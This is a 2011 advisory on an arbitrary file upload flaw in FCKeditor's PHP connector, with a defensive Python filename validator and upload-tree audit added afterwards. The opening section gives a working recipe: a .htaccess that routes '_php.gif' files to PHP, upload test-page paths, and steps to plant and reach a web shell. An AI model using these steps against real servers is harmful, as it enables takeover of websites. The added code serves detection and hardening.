FCKeditor Upload vulnerability in all PHP versions
Author: Anonymous   Source: compiled by this site   Published: 2011-10-25 7:39:07
[+] Title: FCKeditor all versions Arbitrary File Upload Vulnerability
[+] Date: 2011
[+] Author : sinesafe.cn
[+] Website : WwW.sinesafe.cn
———————————————————
1. Create a .htaccess file:
code:
<FilesMatch "_php.gif">
SetHandler application/x-httpd-php
</FilesMatch>

2. Now upload this .htaccess with FCKeditor.

http://www.sinesafe.cn/FCKeditor ... er/upload/test.html
http://www.sinesafe.cn/FCKeditor ... onnectors/test.html
———————————————————————————————-
3. Now upload shell.php.gif with FCKeditor.
4. After the upload, the name "shell.php.gif" is changed to "shell_php.gif" automatically.
5. http://www.sinesafe.cn/anything/shell_php.gif
6. The shell is now reachable on the server.
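The attack above depends on two artifacts landing in the upload directory: a .htaccess that binds the "_php.gif" pattern to the PHP handler, and a renamed upload whose name still carries a "php" fragment. The following script is an added example written for this page from the defender's side; it is not code from the advisory or from FCKeditor. It shows a filename validator a hardened upload handler should apply (reject dotfiles so .htaccess can never be written, allowlist the extension, and refuse any name containing a PHP-like token, which catches both "shell.php.gif" and the renamed "shell_php.gif"), and an audit that walks an existing upload tree and reports both artifacts. The sample tree, the allowlist and all function names are constructed for the example.

```python
"""Defensive checks for the FCKeditor-style upload abuse described above.

Added example (hypothetical code, not the advisory's or FCKeditor's):
  - is_safe_upload_name(): the check an upload handler should run before
    writing anything to disk.
  - audit_upload_tree(): scans a directory for an uploaded .htaccess that
    hands files to PHP, and for upload names that carry a PHP fragment.
The sample tree is constructed in a temporary directory.
"""
import os
import re
import tempfile

# Constructed allowlist for an image upload directory.
ALLOWED_EXTENSIONS = {"gif", "jpg", "jpeg", "png"}

# A PHP-like token delimited by ".", "_" or "-", or at either end of the name.
# "shell.php.gif" and the FCKeditor-renamed "shell_php.gif" both match.
PHP_FRAGMENT = re.compile(r"(^|[._-])(php\d?|phtml|phar)([._-]|$)", re.IGNORECASE)

# Apache directives that route a file to the PHP engine.
HANDLER_DIRECTIVE = re.compile(
    r"^\s*(SetHandler|AddHandler|AddType)\b.*php", re.IGNORECASE | re.MULTILINE
)


def is_safe_upload_name(filename: str) -> bool:
    """Return True only for names a hardened upload handler should accept."""
    base = os.path.basename(filename)
    if not base or base.startswith("."):       # no dotfiles: blocks .htaccess
        return False
    if "." not in base:                         # no extension at all
        return False
    ext = base.rsplit(".", 1)[1].lower()
    if ext not in ALLOWED_EXTENSIONS:           # strict allowlist, not a denylist
        return False
    if PHP_FRAGMENT.search(base):               # "php" anywhere in the name
        return False
    return True


def audit_upload_tree(root: str) -> dict:
    """Report the two artifacts of this attack found under an upload root.

    Returns {"htaccess": [paths], "suspicious_names": [paths]}.
    """
    findings = {"htaccess": [], "suspicious_names": []}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            if name.lower() == ".htaccess":
                try:
                    with open(path, "r", errors="replace") as fh:
                        body = fh.read()
                except OSError:
                    body = ""
                if HANDLER_DIRECTIVE.search(body):
                    findings["htaccess"].append(path)
            elif not is_safe_upload_name(name):
                findings["suspicious_names"].append(path)
    return findings


def build_sample_tree() -> str:
    """Constructed upload tree reproducing the advisory's two artifacts."""
    root = tempfile.mkdtemp(prefix="fck_upload_")
    os.makedirs(os.path.join(root, "image"))
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write('<FilesMatch "_php.gif">\nSetHandler application/x-httpd-php\n</FilesMatch>\n')
    for name in ("logo.gif", "photo.jpg", "shell_php.gif"):
        with open(os.path.join(root, "image", name), "wb") as fh:
            fh.write(b"GIF89a")                 # harmless GIF header bytes
    return root


if __name__ == "__main__":
    sample = build_sample_tree()
    print(audit_upload_tree(sample))
```

The validator refuses the file before it is stored, which is the fix that matters; the audit is for directories that were already exposed. Independently of either, the upload directory should be served with Apache's `AllowOverride None` so that an uploaded .htaccess is ignored, and ideally with no script handler mapped at all.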